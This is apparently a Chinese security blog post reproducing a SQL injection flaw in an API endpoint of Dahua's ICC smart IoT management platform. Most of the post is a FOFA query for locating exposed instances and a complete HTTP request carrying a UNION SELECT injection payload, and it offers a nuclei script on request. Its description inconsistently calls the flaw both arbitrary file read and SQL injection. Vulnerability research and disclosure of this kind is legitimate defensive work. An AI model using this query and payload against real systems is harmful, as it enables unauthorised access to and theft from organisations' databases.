首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >【漏洞复现】大华智能物联管理平台存在SQL注入漏洞

【漏洞复现】大华智能物联管理平台存在SQL注入漏洞

作者头像
熔城Sec
发布2026-07-22 20:25:19
发布2026-07-22 20:25:19
760
举报
漏洞描述

大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。该系统存在任意文件读取漏洞,会造成敏感信息泄露。大华智能物联管理平台evo-apigw/evo-arsm/1.0.0/ars/list接口存在SQL注入漏洞。

资产收集

代码语言:javascript
复制
fofa平台:
body="static/qwebchannel.js" && body="/客户端会小于800/"

漏洞复现

代码语言:javascript
复制
GET /evo-apigw/evo-arsm/1.0.0/ars/list?serviceName=%27+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(0x7e,md5(6),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

nuclei脚本

关注公众号并回复 “ZH-2026-01-15-001” 即可获得该漏洞nuclei脚本

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2026-01-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 熔城Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档